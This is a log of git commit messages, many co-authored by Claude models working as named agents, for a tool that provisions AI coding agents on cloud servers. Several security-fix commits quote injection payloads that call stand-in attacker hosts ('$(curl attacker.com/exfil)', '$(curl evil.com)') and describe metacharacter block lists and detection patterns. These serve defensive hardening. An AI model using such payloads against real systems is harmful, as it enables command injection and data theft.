The security reviewer agent could post contradictory reviews (CHANGES_REQUESTED
then APPROVED) on the same commit because each review_all cycle spawned a fresh
reviewer with no memory of prior runs. Reviews posted via `gh pr review` don't
appear in `gh pr view --comments`, so the existing comment-based dedup missed them.
Adds a review dedup step that fetches existing reviews via the GitHub API and
stops if a prior security review exists on the current HEAD commit. Also adds
commit SHA to the review body format for traceability.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Quote $escaped_cmd in bash -c arguments to prevent word splitting.
While printf '%q' escapes shell metacharacters, the lack of quotes
around the variable causes the shell to split on whitespace before
passing to bash -c, enabling argument injection.
Fixes#1422
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add QA upgrade — macOS compat linter, per-agent mock assertions
Layer 1: macOS compat linter (test/macos-compat.sh)
- 12 rules (MC001–MC012) catching bash 3.2 incompatibilities
- Detects: base64 -w0 file args, non-portable echo flags, source <(),
((var++)), read -d, nounset flag, sed -i, date %N, local -n,
declare -A, ${var,,}, and |&
- Added to CI lint.yml in warn-only mode for burn-in
- Integrated as Phase 0.5 in qa-dry-run.sh
Layer 2: Per-agent mock assertions
- test/fixtures/_shared_agent_assertions.sh with install checks
for all 15 agents (claude, openclaw, aider, goose, etc.)
- Integrated into test/mock.sh via _run_agent_assertions()
Also includes branch fixes:
- Fix base64 -w0 to use stdin redirect (aws, daytona, fly)
- Fix fly/openclaw to use npm install instead of broken curl|bash
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* feat: add E2E test harness and integrate into QA pipeline
Add test/e2e.sh — a full E2E test harness that provisions real servers,
installs agents, and verifies setup across all clouds. Features:
- Smoke test (one canary agent per cloud) and full matrix modes
- Credential auto-detection for 8 clouds
- Per-cloud preflight validation (sequential) then parallel agent tests
- Stale server cleanup, timing history, cross-cloud comparison
- Auto-fix and optimization phases via Claude agents
- macOS bash 3.2 compatible
Integrate E2E as Phase 5 in both qa-cycle.sh and qa-dry-run.sh:
- Runs after mock tests pass, gated on cloud credentials
- Phase 5b auto-fixes failures using per-agent worktree branches
- Parses results and includes in QA summary
Also fixes:
- shared/common.sh: honour SPAWN_NON_INTERACTIVE=1 in safe_read()
- aws/lib/common.sh: fix SSH key import (use cat instead of base64,
handle race condition on concurrent imports)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Quote $escaped_cmd inside the -C argument to bash -c in run_server()
and interactive_session() to prevent word splitting. Without quotes,
even though printf '%q' escapes shell metacharacters, the shell still
splits the escaped command on whitespace before passing it to bash -c,
enabling potential argument injection.
Fixes#1422
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* feat: add headless SDK mode for programmatic provisioning (#1181)
Add --headless and --output json flags to enable non-interactive
provisioning with structured JSON output on stdout.
- --headless: disables prompts, OAuth browser flows, and SSH sessions
- --output json: outputs structured SpawnResult JSON on stdout
- Exit code contract: 0=success, 1=execution, 2=download, 3=validation
- Upfront credential validation (fail-fast before provisioning)
- Script stdout piped to stderr to keep JSON output clean
- SPAWN_HEADLESS=1 env var set for bash scripts
Closes#1181
-- refactor/ux-engineer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: restore critical test mocks for fly SSH readiness checks
The PR inadvertently removed essential mock logic:
- fly ssh mock no longer responded to 'echo ok' commands
- timeout/gtimeout mocks were removed (needed for SSH polling)
- python3 mock was removed (needed for JSON parsing)
- /tmp/spawn_* cleanup was removed from test teardown
This caused 29 fly/* test failures with 'SSH connectivity failed'.
Restores the exact mock implementations from main branch.
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
test/run.sh (3 failures fixed):
- Export TEST_DIR so sprite mock tracks create→list state across processes
- Add sleep mock to avoid 30s polling loops in ensure_sprite_exists
- Add timeout/gtimeout, python3 pass-through mocks for host protection
- Set HOME to fake home for isolation, create fake home directory structure
- Clean up /tmp/spawn_* temp files in cleanup trap
test/mock.sh (29 failures fixed):
- Fix fly mock to detect "echo ok" in fly ssh console -C arguments
(including printf %q escaped form) so _fly_wait_for_ssh() succeeds
- Add timeout/gtimeout pass-through mocks to prevent system calls
- Add python3 delegate mock for JSON parsing in shared/common.sh
- Clean up /tmp/spawn_* temp files in cleanup trap
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Fixes#1411
Replaced unsafe xargs -I{} pattern with grep -F for literal string matching
to prevent command injection if the hcloud context name contains shell
metacharacters.
Previous code: xargs interpolated context name directly into grep pattern
New code: grep -F treats context name as literal string (no interpretation)
Attack vector prevented: malicious context name like '$(curl attacker.com/exfil)'
could execute arbitrary commands during token extraction.
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: prevent command injection in key-request.sh env var loading
Fixes#1405
**Why:**
The _try_load_env_var function loaded API tokens from ~/.config/spawn/{cloud}.json
without validating the value for shell metacharacters. If an attacker could write
malicious config files (e.g., {"HCLOUD_TOKEN": "$(curl evil.com)"}), the injected
commands would execute when the variable was later used in unquoted contexts.
**Changes:**
- Added regex validation in _try_load_env_var (line 88-91) to reject values
containing shell metacharacters: ; ' " < > | & $ ` \ ( )
- Matches the same pattern used in validate_api_token() from shared/common.sh
- Now returns error and logs security warning if malicious characters detected
**Impact:**
Blocks command injection attacks via config file poisoning. API tokens must now
be clean alphanumeric strings (as they should be from legitimate providers).
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: strengthen key-request.sh regex to block all shell metacharacters
Address security review feedback from PR #1415.
**Changes:**
- Replace blocklist regex with whitelist: `^[a-zA-Z0-9._/@-]+$`
- Now blocks `!`, `{`, `}`, `#`, newlines, tabs, and all other metacharacters
- Update comment to clarify defense-in-depth purpose
- Change error message to match validate_api_token() pattern
**Why whitelist approach:**
API tokens from legitimate cloud providers only contain alphanumeric
characters plus safe chars (-, _, ., /, @). Whitelist is more robust
than trying to enumerate all dangerous shell metacharacters.
-- pr-maintainer
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix path traversal risk in SPAWN_HOME validation
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add missing join import and update tests for SPAWN_HOME security validation
Addresses security review feedback on PR #1402:
- Add missing 'join' import to cli-version-and-dispatch.test.ts
- Update all test files to use homedir() instead of tmpdir() for SPAWN_HOME
The security fix in history.ts now enforces that SPAWN_HOME must be within
the user's home directory. All tests have been updated to use home-based
test directories instead of /tmp paths.
Changes:
- cli/src/__tests__/cli-version-and-dispatch.test.ts: Add join to path imports
- All test files: Replace tmpdir() with homedir() and /tmp/spawn- with /.spawn-test-
Tests:
- bun test history.test.ts: ✅ 69 pass
- bun test clear-history.test.ts: ✅ 27 pass
- bun test cli-version-and-dispatch.test.ts: ✅ 62 pass
- bun test list-table-rendering.test.ts: ✅ 8 pass
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes#1406
Changed all heredocs in security.sh from double-quoted to single-quoted
form to prevent variable expansion, then use explicit sed substitution
for validated values only.
This prevents command injection via ${ISSUE_NUM}, ${SLACK_WEBHOOK},
${WORKTREE_BASE}, and ${REPO_ROOT} in the triage, review_all, and scan
mode prompts.
Pattern applied (matching team_building mode):
- Use 'HEREDOC_EOF' (single quotes) to disable expansion
- Replace variables with PLACEHOLDER tokens
- Use sed -i to substitute only validated values
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Add validation in ensure_ssh_key() to prevent path traversal and
arbitrary file upload attacks:
- Validate public key file exists and is a regular file
- Reject symlinks to prevent reading sensitive system files
- Enforce 10KB size limit (SSH pubkeys are ~100-600 bytes)
Fixes#1407
Agent: complexity-hunter
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Replace nested command substitution $(echo "$(whoami)") with $USER
environment variable to prevent potential command injection attacks.
The nested substitution was vulnerable because:
- whoami could be aliased or PATH-manipulated in compromised environments
- Running as root in cloud-init amplified the security impact
- Double nesting was unnecessary complexity
Using $USER is safer because:
- It's a shell variable, not command execution
- No subprocess spawning or PATH resolution
- Simpler and more reliable
Agent: test-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes#1409
The bash sandbox test now verifies that test runs don't create or
modify agent-specific directories and configuration files:
- Checks that ~/.openclaw, ~/.sprite, and ~/.claude directories are
not created by test runs
- Verifies ~/.claude.json and ~/.claude/settings.json are not modified
during tests (using mtime comparison to handle pre-existing files)
- Skips checks for directories/files that existed before tests ran to
avoid false positives in development environments
This ensures tests remain properly sandboxed and don't pollute the
production environment with agent artifacts.
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Replace the complex claude launch pattern (subshell + PID file + tee
pipe + stream-json + 50-line watchdog monitoring log file growth +
session-end detection) with a simple direct launch:
claude -p "..." >> "${LOG_FILE}" 2>&1 &
The watchdog is now just a wall-clock timeout. The idle-output detection,
stream-json result parsing, and tee piping are all removed.
Also remove GitHub Actions concurrency groups — the trigger server
already handles dedup (409 for same issue, 409 for same reason), making
the GH Actions concurrency groups redundant queuing.
Changes:
- refactor.sh: simple launch + wall-clock-only watchdog
- security.sh: same simplification
- discovery.sh: same (refactored _kill_claude_process and
_run_watchdog_loop to simpler signatures)
- All 4 workflows: remove concurrency groups
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* security: fix incomplete command injection detection in prompt validation
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: refine command injection patterns to avoid false positives
Addresses changes requested in PR review:
- Updated && and || patterns to only match when followed by common shell commands
- Added context-aware check to exclude programming expressions like "a > b && c < d"
- Maintains security by still catching shell command chaining attempts
- All security tests pass including new edge case tests
Fixes false positive rejection of legitimate programming expressions
while still detecting shell injection attempts from issue #1400.
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes#1403
**Changes:**
1. **test/run.sh** - Isolated mock state files:
- Changed /tmp/sprite_mock_created* to use TEST_DIR instead
- Added cleanup of any leaked /tmp files in cleanup() trap
- Prevents /tmp pollution from mock sprite state files
2. **test/record.sh** - Sandboxed config directory:
- Added TEST_CONFIG_DIR environment variable support
- When set, overrides HOME to prevent writing to ~/.config/spawn/
- Allows tests to run without polluting production config
3. **test/qa-dry-run.sh** - Safe git operations:
- Changed git checkout to git restore for reverting README changes
- Prevents potential checkout pollution of working tree
- Falls back to git checkout -- for older git versions
4. **test/test-sandbox.sh** - New verification test:
- Verifies no /tmp pollution after test/run.sh
- Verifies production config not modified
- Verifies mock.sh uses isolated temp directories
**Why:** Prevents test suite from polluting production environment (file writes to /tmp, ~/.config/spawn/, git state mutations).
Agent: test-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The trigger server streamed script stdout back to GitHub Actions via a
long-lived HTTP response, requiring --http1.1, heartbeat injection,
server.timeout(req, 0), createEnqueuer, drainStreamOutput, and 90-min
GH Actions timeouts. In practice GitHub Actions is just a dumb trigger
— the real state lives on the VM (log files, journalctl). Simplify to
fire-and-forget: spawn script, return 200 JSON immediately.
Also fix the refactor and discovery team lead monitoring loops. The
prompts buried the loop in a single compressed line that the model
ignored (doing Bash("sleep 10") repeatedly without calling TaskList).
Replace with a dedicated "Monitor Loop (CRITICAL)" section with numbered
steps, matching the security.sh pattern that actually works.
Changes:
- trigger-server.ts: remove ~150 lines of streaming code (createEnqueuer,
drainStreamOutput, startStreamingRun, heartbeat, ReadableStream),
replace with startFireAndForgetRun (stdout: "inherit", immediate JSON)
- All 4 workflows: simple curl POST, timeout-minutes 90→5, remove
--http1.1/-N/--max-time/exit-code handling
- refactor.sh: add Monitor Loop (CRITICAL) section with numbered steps
- discovery-team-prompt.txt: same Monitor Loop fix
- SKILL.md: update architecture docs, remove streaming sections
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* security: fix medium severity findings from scan #763
Addresses remaining medium-severity security findings from issue #763:
1. **Path traversal in invalidate_cloud_key** (shared/key-request.sh)
- Removed dots from provider name validation regex
- Changed from ^[a-z0-9][a-z0-9._-]{0,63}$ to ^[a-z0-9][a-z0-9_-]{0,63}$
- Prevents path traversal via sequences like "foo..bar"
2. **Background process timeout** (shared/key-request.sh)
- Wrapped fire-and-forget key request in timeout 15s
- Prevents leaked subprocess if curl hangs beyond --max-time
3. **Rate limiting IP spoofing** (.claude/skills/setup-agent-team/key-server.ts)
- Switched from x-forwarded-for header to server.requestIP(req)
- Uses actual connection IP instead of spoofable header
Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: add macOS portability for timeout command
Address review feedback from security team - timeout command is not available
on macOS by default. Added fallback pattern that:
- Uses timeout on Linux (prevents subprocess leak)
- Falls back to curl --max-time only on macOS
This ensures request_missing_cloud_keys() works on both platforms.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* security: fix command injection vulnerability in key-request.sh
Fixes the critical command injection vulnerability identified in security review.
Changes:
- Use positional parameters ($1, $2, $3) instead of variable interpolation in bash -c
- Pass variables via -- delimiter to prevent shell escaping issues
- Replace echo with printf for proper formatting (macOS bash 3.x compat)
- Maintain timeout wrapper on Linux and curl --max-time fallback on macOS
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixed readonly property assignments in commands-compact-list.test.ts by using the existing setTerminalWidth() helper instead of direct Object.defineProperty() calls. This makes the code more maintainable and consistent.
Updated oracle-provider-patterns.test.ts to check for install_claude_code function instead of the outdated claude.ai/install.sh reference, matching the current oracle/claude.sh implementation.
Changes:
- Replaced 4 inline Object.defineProperty() calls with setTerminalWidth() helper
- Updated oracle claude.sh test to check for install_claude_code instead of claude.ai/install.sh
- All compact list tests passing (20/20)
Fixes#1366
Agent: complexity-hunter
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
This commit addresses issue #1373 by improving the test sandbox to prevent
accidental writes to the real user environment.
Changes:
1. Enhanced preload.ts:
- Added .ssh directory creation in sandboxed HOME
- Expanded documentation explaining sandboxing strategy
- Clarified safety guarantees for filesystem operations
2. Added sandbox-verification.test.ts:
- Comprehensive test suite verifying sandbox isolation
- Tests environment variable sandboxing (HOME, XDG_*)
- Tests pre-created directories (.config, .ssh, .claude, .cache)
- Tests filesystem isolation (writes stay in temp directory)
- Tests subprocess isolation (bash inherits sandboxed env)
- Tests safety guarantees (no exposure of /root paths)
The existing preload.ts already prevented writes to real home directory
by redirecting process.env.HOME and XDG variables to temp directories.
This commit strengthens that sandboxing with the .ssh directory and adds
comprehensive verification tests to ensure the sandbox works correctly.
Fixes#1373
Agent: test-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Implements spawn name feature (#1372) to improve UX:
- Add optional spawn name prompt in interactive mode
- Pass spawn name via SPAWN_NAME env var to shell scripts
- Shell scripts use spawn name as default for resource names
- Store spawn name in history for future reference
- Bump CLI version to 0.4.0
The spawn name is prompted before agent/cloud selection and
automatically used as the default for platform-specific resource
names (server name on Hetzner, sprite name on Sprite, etc.).
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Applied the test fixes from PR #1358:
1. Fixed process.stdout.columns mutation in commands-compact-list.test.ts
- Replaced direct property assignments with Object.defineProperty
- Created setColumns() helper function for strict mode compatibility
- Removed duplicate setTerminalWidth() function
2. Updated oracle-provider-patterns.test.ts assertion
- Changed from checking for "claude.ai/install.sh" URL
- Now checks for "install_claude_code" function name
- Matches current oracle/claude.sh implementation
Note: Shell scripts (aws/gptme.sh, gcp/gptme.sh) already have
set -eo pipefail from previous commits - no changes needed.
Fixes#1365
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Replace select prompts with autocomplete for improved UX when
choosing agents and clouds. Users can now type to filter the list,
significantly reducing time to find desired options in long lists.
- Replace p.select with p.autocomplete for agent selection
- Replace p.select with p.autocomplete for cloud selection
- Add "type to filter" messaging and placeholder text
- Update CLI version 0.3.2 → 0.3.3
Fixes#1367
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Add input validation for SSH connection parameters (IP, username, server_name)
and server identifiers used in delete operations. This prevents command injection
attacks if ~/.spawn/history.json is corrupted or tampered with.
Changes:
- Add validateConnectionIP() - validates IPv4/IPv6 addresses and sentinels
- Add validateUsername() - validates Unix username format
- Add validateServerIdentifier() - validates server names/IDs
- Update cmdConnect() to validate all connection params before use
- Update buildDeleteScript() to validate server IDs before interpolation
- Update mergeLastConnection() to validate data from bash scripts
- Add comprehensive test coverage for all validation functions
- Bump CLI version to 0.3.3 (security patch)
Security impact:
- Prevents HIGH severity command injection via history.ip/user (issue #1381)
- Prevents MEDIUM severity command injection via server_id (issue #1380)
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
The refactor bot was too passive: it ran for 29 minutes, all 7 teammates
used plan mode, none submitted plans, and it ignored a HIGH severity
security issue plus 4 safe-to-work issues.
Root cause: plan_mode_required on ALL teammates created too much friction
for issue-driven work. Teammates had to analyze, plan, submit, and wait
for approval — all within a tight time window.
Fix: two-track spawning system:
- Issue track: teammates assigned to labeled issues (safe-to-work,
security, bug) spawn WITHOUT plan mode. The label IS the approval.
- Proactive track: teammates doing optional scanning still use plan
mode to prevent invented work.
Also:
- Diminishing Returns Rule now explicitly exempts issue-driven work
- Issue-First Policy is now forceful: labeled issues are mandates
- Team structure maps teammates to issue label types
- Cycle timeout bumped from 15 to 25 min for issue fixing
- Discovery prompt updated with same two-track pattern
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* test: add mock test coverage for all 15 Fly.io agent scripts
Fly.io had zero test coverage — every bug fixed this session (stale
tokens, FlyV1 auth, name-taken failures, SSH hangs, PATH issues) went
undetected. This adds the full mock test infrastructure:
- test/fixtures/fly/ — env vars, API assertions, fixture JSONs for
app creation, machine creation, and token validation endpoints
- test/mock-curl-script.sh — URL stripping for api.machines.dev,
body validation for machine creation, synthetic status responses,
app creation POST handler, state tracking
- test/mock.sh — mock fly/flyctl CLI binary (ssh console, auth token),
URL stripping, required field validation, base64 mock
- test/record.sh — Fly.io REST endpoints now recordable, live
create+delete cycle, error detection, auth var mapping
All 15 agent scripts (aider, claude, openclaw, etc.) are automatically
discovered and tested: 75 passed, 0 failed.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: use official curl installer for OpenClaw on Fly.io
bun install -g openclaw fails on Fly.io's bare Ubuntu image. Switch to
the official installer (curl -fsSL https://openclaw.ai/install.sh | bash)
which handles Node.js detection and dependency installation automatically.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: re-prompt on taken Fly.io app names + timeout run_server
Two fixes for Fly.io UX:
1. When app name is globally taken by another user, re-prompt instead
of failing. Returns exit code 2 from _fly_create_app so create_server
can loop with a new name.
2. run_server now has a 5-minute timeout (portable, no coreutils needed)
to prevent indefinite hangs like the 3-hour SSH session stall.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: wait for SSH before installing tools on Fly.io
The previous wait_for_cloud_init immediately ran apt-get via fly ssh
console on a machine that wasn't SSH-reachable yet, causing indefinite
hangs. Now:
1. _fly_wait_for_ssh polls with a 30s-timeout echo until SSH responds
2. Shows progress at each step instead of suppressing all output
3. Each run_server call has an explicit timeout (10min for apt, 2min
for bun, 30s for PATH exports)
4. Retries package install once on timeout
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: run fly ssh console in foreground, not background
fly ssh console breaks when backgrounded with & — it needs a foreground
process to establish the connection. Reverted to foreground execution
and use timeout/gtimeout when available (Linux/CI). On macOS where
timeout isn't available, the user can Ctrl+C hung commands.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: ensure bun PATH is available in non-interactive fly ssh sessions
Ubuntu's default .bashrc returns early for non-interactive shells,
so "source ~/.bashrc && bun install -g openclaw" silently fails —
the PATH line at the bottom of .bashrc is never reached.
Fix by prepending ~/.bun/bin to PATH in run_server() so all remote
commands have access to tools installed during wait_for_cloud_init.
Also fix spawn_agent to explicitly handle agent_install failure
instead of relying on set -e (which exits silently).
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fly.io had zero test coverage — every bug fixed this session (stale
tokens, FlyV1 auth, name-taken failures, SSH hangs, PATH issues) went
undetected. This adds the full mock test infrastructure:
- test/fixtures/fly/ — env vars, API assertions, fixture JSONs for
app creation, machine creation, and token validation endpoints
- test/mock-curl-script.sh — URL stripping for api.machines.dev,
body validation for machine creation, synthetic status responses,
app creation POST handler, state tracking
- test/mock.sh — mock fly/flyctl CLI binary (ssh console, auth token),
URL stripping, required field validation, base64 mock
- test/record.sh — Fly.io REST endpoints now recordable, live
create+delete cycle, error detection, auth var mapping
All 15 agent scripts (aider, claude, openclaw, etc.) are automatically
discovered and tested: 75 passed, 0 failed.
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
* fix: validate saved API tokens before use
Tokens loaded from config files (e.g. ~/.config/spawn/fly.json) were
never validated, so expired or revoked tokens would silently pass through
and only fail at the point of use (e.g. app creation). Now the provider's
test function runs on config-file tokens too, falling through to a fresh
prompt if validation fails.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: handle FlyV1 token auth scheme for Fly.io Machines API
Fly.io dashboard tokens use the format "FlyV1 fm2_..." where "FlyV1" is
the authorization scheme itself, not a Bearer token prefix. The script was
always sending "Authorization: Bearer FlyV1 fm2_..." which the API rejects
with "token validation error". Now detects FlyV1-prefixed tokens and sends
them as "Authorization: FlyV1 fm2_..." using custom auth headers.
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* fix: make refactor service actually run reliably
Three fixes for the refactor workflow that was producing zero PRs:
1. community-coordinator: Gemini → Sonnet — Gemini doesn't support
the Task tool, causing a respawn on every single cycle
2. Monitoring loop: replace "sleep 5" (which drifted to sleep 30)
with explicit short-sleep instructions and CRITICAL rule that
every turn must include a tool call to stay alive
3. Lifecycle management: explicit shutdown sequence with retry,
preventing early exit that orphans teammates
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Fixes#1354 - users experienced a ~30s delay with "gateway not connected"
errors when trying to use OpenClaw immediately after launch.
Root cause: gateway takes time to bind to port 18789, but TUI launched
after only 2 seconds.
Solution: Add wait_for_openclaw_gateway() helper that polls the gateway
port (max 30s) before launching TUI, ensuring immediate usability.
Changes:
- shared/common.sh: Add wait_for_openclaw_gateway() function
- All openclaw.sh scripts (10 files): Replace sleep 2 with gateway readiness check
Agent: ux-engineer
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Make install_agent() check exit codes and fail fast when installation
commands return non-zero. Previously, the function would silently
continue even when installations failed due to bash || operators
returning 0.
This fix ensures that installation failures (network timeouts, missing
dependencies, package not found) are caught immediately with actionable
error messages instead of confusing runtime errors during session launch.
Affected ~30 agent scripts using patterns like:
- pip install X 2>/dev/null || pip3 install X
- command -v bun && bun install X || npm install X
Agent: code-health
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes path traversal vulnerability where unvalidated filenames from
GitHub API could write files outside intended directory.
Attack vector: MITM attack or DNS hijacking could inject filenames
like "../../../../../../tmp/evil.ts" to write arbitrary files.
Fix: Validate filenames before download - block "..", "/", and "\\"
to ensure files are written only within ${dest}/cli/src/
Severity: HIGH/CRITICAL
Affects: All users running installer via curl|bash
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes#1376 - HIGH severity path traversal in CLI installer
Fixes#1377 - MEDIUM severity unquoted variable in hetzner token extraction
Changes:
- cli/install.sh: Replace string prefix matching with canonicalized path
comparison to prevent path traversal in rm -rf cleanup. The previous
check could be bypassed with sequences like "/tmp/../../home/user".
- hetzner/lib/common.sh: Quote xargs placeholder variable to prevent
unexpected behavior if hcloud context name contains shell metacharacters.
Agent: security-auditor
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: auto-run gcloud auth login on expired GCP tokens
Instead of telling users to run `gcloud auth login` manually, just
run it automatically when auth check fails or instance creation hits
a reauthentication error, then retry.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: prioritize clouds with CLI installed + hcloud CLI integration
When selecting a cloud provider, clouds are now sorted in 3 tiers:
1. Credentials detected (env vars set) — top priority
2. CLI installed (e.g., gcloud, hcloud, aws) — middle priority
3. Neither — default order
Also adds hcloud CLI-first support for Hetzner operations (server
create/delete/list, SSH key management, auth) with automatic fallback
to the existing REST API when hcloud is not available.
Closes#1370
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* refactor: rename aws-lightsail to aws across the project
Simplifies the cloud key from "aws-lightsail" to "aws" — AWS should
have a single entry regardless of the underlying service used.
Renames the directory, updates manifest.json matrix keys, CLI map,
test fixtures, README, and all agent scripts.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* chore: replace open-source models with Gemini Flash and Sonnet in workflows
Drop moonshotai/kimi-k2.5 and Haiku from refactor/security workflows.
Lightweight tasks (triage, issue-checker, community-coordinator) now use
google/gemini-3-flash-preview; all other teammates upgraded to Sonnet.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* chore: ensure CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1 in all workflows
Add the required feature flag export to refactor.sh and security.sh
(discovery.sh already had it). Also update SKILL.md wrapper template
and agent teams reference section to document the requirement.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* chore: persist CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS into .spawnrc
All three service scripts now check for ~/.spawnrc and idempotently
append the agent teams feature flag if missing. This ensures every
Claude session on the VM inherits the flag, not just the one launched
by the service script. Also documents the pattern in SKILL.md.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* chore: add CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS to qa-cycle.sh
Complete the coverage — qa-cycle.sh now also exports the agent teams
feature flag and persists it to .spawnrc, matching the other three
service scripts.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
---------
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Extracted EXIT_CODE_GUIDANCE and SIGNAL_GUIDANCE from commands.ts into a
new guidance-data.ts module. This reduces commands.ts complexity by 100+ lines,
making error handling logic more maintainable and focused.
Changes:
- New file: cli/src/guidance-data.ts (116 lines) with error/signal guidance data
- Refactored: commands.ts now 100 lines shorter, imports guidance data
- Improved: Exit code 1 handling to avoid circular dependency with credentialHints
The extracted module is a pure data file focused on error messages and guidance,
separate from the command execution logic.
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Instead of telling users to run `gcloud auth login` manually, just
run it automatically when auth check fails or instance creation hits
a reauthentication error, then retry.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
The result event detection in refactor.sh, discovery.sh, and security.sh
was killing the entire process tree 30s after the team lead's session
ended. In team-based workflows, the team lead's "result" event fires
after spawning teammates — while the actual work is still running as
child processes.
Instead of immediately killing on result detection, monitor the claude
process's child processes via pgrep. While teammates are running, reset
the idle counter to prevent false timeouts. Only shut down once all
teammate processes have completed (or the hard timeout fires).
